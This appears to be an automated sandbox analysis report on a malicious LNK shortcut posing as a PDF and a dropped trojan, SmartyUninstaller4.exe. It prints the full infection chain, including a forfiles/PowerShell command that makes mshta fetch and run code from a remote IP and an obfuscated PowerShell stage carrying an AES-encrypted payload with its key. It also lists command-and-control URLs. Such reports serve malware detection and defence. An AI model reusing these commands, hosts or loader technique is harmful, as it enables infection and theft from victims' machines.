Source: SmartyUninstaller4.exe, 0000000F.00000000.1925323681.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, SmartyUninstaller4.exe, 0000000F.00000003.2032955738.0000000002AEA000.00000004.00000800.00020000.00000000.sdmp, SmartyUninstaller4.exe.5.dr String found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: svchost.exe, 00000004.00000003.1694309548.000001463A792000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.dr String found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
Source: edb.log.4.dr String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
Source: SmartyUninstaller4.exe, 0000000F.00000002.2057155775.0000000000738000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://panameradovkews.xyz/
Source: SmartyUninstaller4.exe, 0000000F.00000002.2057155775.0000000000738000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://panameradovkews.xyz/$0
Source: SmartyUninstaller4.exe, 0000000F.00000002.2057155775.0000000000738000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://panameradovkews.xyz/Z0?
Source: SmartyUninstaller4.exe, 0000000F.00000003.2052648578.0000000000761000.00000004.00000020.00020000.00000000.sdmp, SmartyUninstaller4.exe, 0000000F.00000002.2057940746.000000000076B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://panameradovkews.xyz/api
Source: SmartyUninstaller4.exe, 0000000F.00000003.2052648578.0000000000761000.00000004.00000020.00020000.00000000.sdmp, SmartyUninstaller4.exe, 0000000F.00000002.2057940746.000000000076B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://panameradovkews.xyz/apiYd
Source: SmartyUninstaller4.exe, 0000000F.00000002.2057155775.0000000000738000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://panameradovkews.xyz/pi
Source: SmartyUninstaller4.exe, 0000000F.00000002.2057155775.0000000000738000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://panameradovkews.xyz/z/w0
Source: SmartyUninstaller4.exe, 0000000F.00000002.2057812800.0000000000756000.00000004.00000020.00020000.00000000.sdmp, SmartyUninstaller4.exe, 0000000F.00000003.2052648578.0000000000754000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://panameradovkews.xyz:443/api
Source: SmartyUninstaller4.exe, 0000000F.00000003.2052648578.0000000000774000.00000004.00000020.00020000.00000000.sdmp, SmartyUninstaller4.exe, 0000000F.00000002.2057155775.0000000000738000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://proffyrobharborye.xyz/
Source: SmartyUninstaller4.exe, 0000000F.00000002.2057155775.0000000000738000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://proffyrobharborye.xyz/A0
Source: SmartyUninstaller4.exe, 0000000F.00000003.2052648578.0000000000761000.00000004.00000020.00020000.00000000.sdmp, SmartyUninstaller4.exe, 0000000F.00000003.2052648578.000000000078A000.00000004.00000020.00020000.00000000.sdmp, SmartyUninstaller4.exe, 0000000F.00000002.2057940746.000000000076B000.00000004.00000020.00020000.00000000.sdmp, SmartyUninstaller4.exe, 0000000F.00000002.2057940746.000000000078C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://proffyrobharborye.xyz/api
Source: SmartyUninstaller4.exe, 0000000F.00000003.2052648578.0000000000761000.00000004.00000020.00020000.00000000.sdmp, SmartyUninstaller4.exe, 0000000F.00000002.2057940746.000000000076B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://proffyrobharborye.xyz/apiyz
Source: SmartyUninstaller4.exe, 0000000F.00000002.2057155775.0000000000738000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://proffyrobharborye.xyz/l0-
Source: SmartyUninstaller4.exe, 0000000F.00000002.2057812800.0000000000756000.00000004.00000020.00020000.00000000.sdmp, SmartyUninstaller4.exe, 0000000F.00000003.2052648578.0000000000754000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://proffyrobharborye.xyz:443/api
Source: SmartyUninstaller4.exe, 0000000F.00000002.2057155775.0000000000738000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://radiationcommentwks.xyz/api
Source: SmartyUninstaller4.exe, 0000000F.00000002.2057155775.0000000000738000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://radiationcommentwks.xyz/apie
Source: SmartyUninstaller4.exe, 0000000F.00000003.2052648578.0000000000761000.00000004.00000020.00020000.00000000.sdmp, SmartyUninstaller4.exe, 0000000F.00000002.2057940746.000000000076B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://slammyslideplanntywks.xyz/
Source: SmartyUninstaller4.exe.5.dr String found in binary or memory: https://www.certum.pl/CPS0
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown Network traffic detected: HTTP traffic on port 49750 -> 443
Contains functionality for read data from the clipboard
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 15_2_02AADC70 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalFix,GlobalUnWire,CloseClipboard, 15_2_02AADC70
Contains functionality to read the clipboard data
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 15_2_02AADC70 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalFix,GlobalUnWire,CloseClipboard, 15_2_02AADC70

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 0000000F.00000002.2055622562.00000000006D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Jump to dropped file
Very long command line found
Source: C:\Windows\System32\mshta.exe Process created: Commandline size = 3037
Source: C:\Windows\System32\mshta.exe Process created: Commandline size = 3037 Jump to behavior
Windows shortcut file (LNK) contains suspicious command line arguments
Source: CarrierAgreement.pdf.lnk.mal.lnk LNK file: /p C:\Windows /m win.ini /c "powershell . mshta http://92.118.112.135/carrieragreement"
Contains functionality to call native functions
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 15_2_0071E169 NtCreateSection,NtMapViewOfSection,VirtualAlloc,NtMapViewOfSection,VirtualProtect,VirtualProtect,VirtualProtect, 15_2_0071E169
Creates files inside the system directory
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp Jump to behavior
Detected potential crypto function
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 15_2_0071E169 15_2_0071E169
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 15_2_006D05A9 15_2_006D05A9
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 15_2_006D0000 15_2_006D0000
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 15_2_006F501D 15_2_006F501D
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 15_2_0070C156 15_2_0070C156
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 15_2_006F7256 15_2_006F7256
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 15_2_006EE296 15_2_006EE296
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 15_2_006D5366 15_2_006D5366
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 15_2_006D7319 15_2_006D7319
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 15_2_006DB4F6 15_2_006DB4F6
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 15_2_007037E6 15_2_007037E6
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 15_2_006D6786 15_2_006D6786
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 15_2_006F18F3 15_2_006F18F3
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 15_2_006E0886 15_2_006E0886
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 15_2_006D89BB 15_2_006D89BB
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 15_2_006F99B5 15_2_006F99B5
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 15_2_006F9A47 15_2_006F9A47
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 15_2_00706A96 15_2_00706A96
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 15_2_006F9A9B 15_2_006F9A9B
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 15_2_006F2B96 15_2_006F2B96
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 15_2_006D9C36 15_2_006D9C36
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 15_2_006D5D86 15_2_006D5D86
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 15_2_0070BE36 15_2_0070BE36
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 15_2_006D7FE6 15_2_006D7FE6
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 15_2_02A88210 15_2_02A88210
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 15_2_02A8436F 15_2_02A8436F
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 15_2_02A860AC 15_2_02A860AC
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 15_2_02AA8021 15_2_02AA8021
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 15_2_02AB5070 15_2_02AB5070
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 15_2_02AA8075 15_2_02AA8075
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 15_2_02AA1170 15_2_02AA1170
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 15_2_02ABA730 15_2_02ABA730
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 15_2_02ABA410 15_2_02ABA410
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 15_2_02AA35F7 15_2_02AA35F7
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 15_2_02A865C0 15_2_02A865C0
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 15_2_02A89AD0 15_2_02A89AD0
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 15_2_02A85BF8 15_2_02A85BF8
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 15_2_02AA5830 15_2_02AA5830
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 15_2_02A9C870 15_2_02A9C870
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 15_2_02A9FECD 15_2_02A9FECD
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 15_2_02A8EE60 15_2_02A8EE60
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 15_2_02AA7F8F 15_2_02AA7F8F
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 15_2_02A85D9D 15_2_02A85D9D
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 15_2_02AB1DC0 15_2_02AB1DC0
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 15_2_02A84D60 15_2_02A84D60
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: String function: 006DA576 appears 72 times
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: String function: 006DAB96 appears 131 times
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: String function: 02A89170 appears 131 times
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: String function: 02A88B50 appears 72 times
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE Jump to behavior
Yara signature match
Source: 0000000F.00000002.2055622562.00000000006D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: classification engine Classification label: mal100.troj.evad.winLNK@27/55@12/3
Source: agreement.pdf.5.dr Initial sample: mailto:brian.adams@r2gsol.com
Source: agreement.pdf.5.dr Initial sample: mailto:morgan.smith@r2gsol.com
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 15_2_006D0CB9 CreateToolhelp32Snapshot,Thread32First,Wow64SuspendThread,FindCloseChangeNotification, 15_2_006D0CB9
Source: C:\Windows\System32\mshta.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7848:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_arshfxs5.aak.ps1 Jump to behavior
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Windows\System32\conhost.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\forfiles.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: CarrierAgreement.pdf.lnk.mal.lnk Virustotal: Detection: 27%
Source: CarrierAgreement.pdf.lnk.mal.lnk ReversingLabs: Detection: 21%
Source: unknown Process created: C:\Windows\System32\forfiles.exe "C:\Windows\System32\forfiles.exe" /p C:\Windows /m win.ini /c "powershell . mshta http://92.118.112.135/carrieragreement"
Source: C:\Windows\System32\forfiles.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\forfiles.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe . mshta http://92.118.112.135/carrieragreement
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" http://92.118.112.135/carrieragreement
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function aaTynIUh($PiQE){return -split ($PiQE -replace '..', '0x$& ')};$VuCCamL = aaTynIUh('E5A55824D9EAF8A8C3514E39CEDEF30B918A2A1589DF287752B8D027F1DFBF83EE12DB088588624EC45E743D432DCA79C93A71346B475008579989A09F5D98E1D33138882FF475A777BFA374EB0BFD6A0B25AA253A05AF641E20F4C77FC5CD0BE786B5EAA1F37060C9B9C4DA610ABA833E1A608F90B5E6B8D0C72A052CE081AB6CEF4890ABA76C1939DBFDD7FC25ACC315BBF81EE00ED5787C37F8EC15BBBDC9534009AE0B1FAA407C742099126C7FD0D4FE48ED239BE661785C96903D2AED48751F6A32EA8FFA5B259E531FDE2EBF959342027F3F21889F4103EF93280E2115E8BCEF81D14F8F1D89FF8A475B2F2B6767EDC2491A188CC66BF8A2D116BBD2EDADACC2568D9E03C1330B480BB24242F43AF308990B03DE2465DE44C087B8FDB79C2730BDA7EF8701F2098485DEDB88534CEB321A754FAF5DFF2DFCE6F9109288BE3A78B858A0BAED175DE2205F8F17399B26D860EF1D36E319889DDF54024D57413E8ED3BEE8124C99DC0646E86AF2E54A5DEBC68B17BE7F7790E239CC2289250802915B60ED57ECB3427EAA9BE75B0D811C4C5B5A1BC67E8A4E562AF8BB426F451AD03756F2DA6C85FD25754E21264E99ADB5CBE785D577DF55A5CFC65B2968F737477CC6D303C6B6AE4ADD6B71C05EF67DE56A89B1959E503669C7B27D1EB3EB0609B8D7F9D259D985807288297EFEF04CF7B98A19BBE5FEBF808E5D0B15E790F44431D0F52E70C27ECA747B9168AACC8B7730C50B98B31A5E95CF43E58AB8DA6BF46550035D830DBF8CE8A450849D09E261020820A3C898AC6BC7CA589994D1A7BC6CBB01495D1CA57D60B1E68AF9D1E53C5BD5310153FC3E2B8DFD9D910AA312BC6C305AA7DE3E6C1D1689D0E1B54ECBA688DB6977B50F8ADB1C843896B619A4C1C88BC05BA171BAF12FB0751D9425C26258CBB29B82CA964FDCFBB779D338C140E4B54AD473109871DA665A1028B5489F2936C002C23995EAAD75FAEC7D1C23658D72E5BCA801DBF50A83D1585FB03487AACBE213CBFBAF54DDF43E0CC1780607030370FD254E6D185EC019BED40DF3A26364E22144A3A2AB186D06DF0AF4FE35CA93D05915D6D6D7D3C7A54F25E18421320862CE1CC9B0C7B510C13A30A01950668FE380F154C133E73AB0E0C92A044F3669BE276DD745D220149675000E09D63EE960879409BFEDEDA3483BC1079257FCEC92518331731EBF09B0068461A60C6FE5450A668155187769B3714F8674259AE2383B26BFC047B3345B4B1A2E81BC4ACC879B282641BEA83118BD16A91C3FB040349F9A220F52F0A904E971C68A8B7AE7F5860034B22033F31CAF74B121D6F0672EDF133C9764CF0B79274ADA57554D5617BDEB924FDD1A69B7BCA18D34E108B89C42EAF960A2FE309D50F3E17C6EC586E0EF4646E2D418053C151C42EA1E041F414D94AAEC7DCA3D6086FEFF2D608A4D5DEA1B781AEA3109FCF4EF60DBA03DCB649FE16896B50AED1F8D5319155B11B14787101FA727118B88D50589B74206D84CD45A5FFF0653B0DC3265B92186DA8EAE07E65D0B6F1F9562421931175ADCDB8346280E92044D6DF6C3D7D6C52C1B0961211A8CD2138E79D9387D320F595E3DFFAC8D1B0D2636413271E4DC4BF7316364061FF4C0A348C05FDFAAE265E971340F850E916C6EDEF9420625A4401A18306FFA9047A91CDEAD91F699FE8D0055E27192A17C38DCBCEA41A83C4E3158F4D0F8634F43AC1CAAE822B7E6');$VTjxj = [System.Security.Cryptography.Aes]::Create();$VTjxj.Key = aaTynIUh('7566656A62656D6D6241736C57716B6A');$VTjxj.IV = New-Object byte[] 16;$paOghKFl = $VTjxj.CreateDecryptor();$EkiGvPGrs = $paOghKFl.TransformFinalBlock($VuCCamL, 0, $VuCCamL.Length);$NvSFUKzSO = [System.Text.Encoding]::Utf
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\agreement.pdf"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2088 --field-trial-handle=1648,i,191609744094753054,4714144036431359762,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe "C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe"
Source: C:\Windows\System32\forfiles.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe . mshta http://92.118.112.135/carrieragreement Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" http://92.118.112.135/carrieragreement Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function aaTynIUh($PiQE){return -split ($PiQE -replace '..', '0x$& ')};$VuCCamL = aaTynIUh('E5A55824D9EAF8A8C3514E39CEDEF30B918A2A1589DF287752B8D027F1DFBF83EE12DB088588624EC45E743D432DCA79C93A71346B475008579989A09F5D98E1D33138882FF475A777BFA374EB0BFD6A0B25AA253A05AF641E20F4C77FC5CD0BE786B5EAA1F37060C9B9C4DA610ABA833E1A608F90B5E6B8D0C72A052CE081AB6CEF4890ABA76C1939DBFDD7FC25ACC315BBF81EE00ED5787C37F8EC15BBBDC9534009AE0B1FAA407C742099126C7FD0D4FE48ED239BE661785C96903D2AED48751F6A32EA8FFA5B259E531FDE2EBF959342027F3F21889F4103EF93280E2115E8BCEF81D14F8F1D89FF8A475B2F2B6767EDC2491A188CC66BF8A2D116BBD2EDADACC2568D9E03C1330B480BB24242F43AF308990B03DE2465DE44C087B8FDB79C2730BDA7EF8701F2098485DEDB88534CEB321A754FAF5DFF2DFCE6F9109288BE3A78B858A0BAED175DE2205F8F17399B26D860EF1D36E319889DDF54024D57413E8ED3BEE8124C99DC0646E86AF2E54A5DEBC68B17BE7F7790E239CC2289250802915B60ED57ECB3427EAA9BE75B0D811C4C5B5A1BC67E8A4E562AF8BB426F451AD03756F2DA6C85FD25754E21264E99ADB5CBE785D577DF55A5CFC65B2968F737477CC6D303C6B6AE4ADD6B71C05EF67DE56A89B1959E503669C7B27D1EB3EB0609B8D7F9D259D985807288297EFEF04CF7B98A19BBE5FEBF808E5D0B15E790F44431D0F52E70C27ECA747B9168AACC8B7730C50B98B31A5E95CF43E58AB8DA6BF46550035D830DBF8CE8A450849D09E261020820A3C898AC6BC7CA589994D1A7BC6CBB01495D1CA57D60B1E68AF9D1E53C5BD5310153FC3E2B8DFD9D910AA312BC6C305AA7DE3E6C1D1689D0E1B54ECBA688DB6977B50F8ADB1C843896B619A4C1C88BC05BA171BAF12FB0751D9425C26258CBB29B82CA964FDCFBB779D338C140E4B54AD473109871DA665A1028B5489F2936C002C23995EAAD75FAEC7D1C23658D72E5BCA801DBF50A83D1585FB03487AACBE213CBFBAF54DDF43E0CC1780607030370FD254E6D185EC019BED40DF3A26364E22144A3A2AB186D06DF0AF4FE35CA93D05915D6D6D7D3C7A54F25E18421320862CE1CC9B0C7B510C13A30A01950668FE380F154C133E73AB0E0C92A044F3669BE276DD745D220149675000E09D63EE960879409BFEDEDA3483BC1079257FCEC92518331731EBF09B0068461A60C6FE5450A668155187769B3714F8674259AE2383B26BFC047B3345B4B1A2E81BC4ACC879B282641BEA83118BD16A91C3FB040349F9A220F52F0A904E971C68A8B7AE7F5860034B22033F31CAF74B121D6F0672EDF133C9764CF0B79274ADA57554D5617BDEB924FDD1A69B7BCA18D34E108B89C42EAF960A2FE309D50F3E17C6EC586E0EF4646E2D418053C151C42EA1E041F414D94AAEC7DCA3D6086FEFF2D608A4D5DEA1B781AEA3109FCF4EF60DBA03DCB649FE16896B50AED1F8D5319155B11B14787101FA727118B88D50589B74206D84CD45A5FFF0653B0DC3265B92186DA8EAE07E65D0B6F1F9562421931175ADCDB8346280E92044D6DF6C3D7D6C52C1B0961211A8CD2138E79D9387D320F595E3DFFAC8D1B0D2636413271E4DC4BF7316364061FF4C0A348C05FDFAAE265E971340F850E916C6EDEF9420625A4401A18306FFA9047A91CDEAD91F699FE8D0055E27192A17C38DCBCEA41A83C4E3158F4D0F8634F43AC1CAAE822B7E6');$VTjxj = [System.Security.Cryptography.Aes]::Create();$VTjxj.Key = aaTynIUh('7566656A62656D6D6241736C57716B6A');$VTjxj.IV = New-Object byte[] 16;$paOghKFl = $VTjxj.CreateDecryptor();$EkiGvPGrs = $paOghKFl.TransformFinalBlock($VuCCamL, 0, $VuCCamL.Length);$NvSFUKzSO = [System.Text.Encoding]::Utf Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\agreement.pdf" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe "C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe" Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2088 --field-trial-handle=1648,i,191609744094753054,4714144036431359762,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\forfiles.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
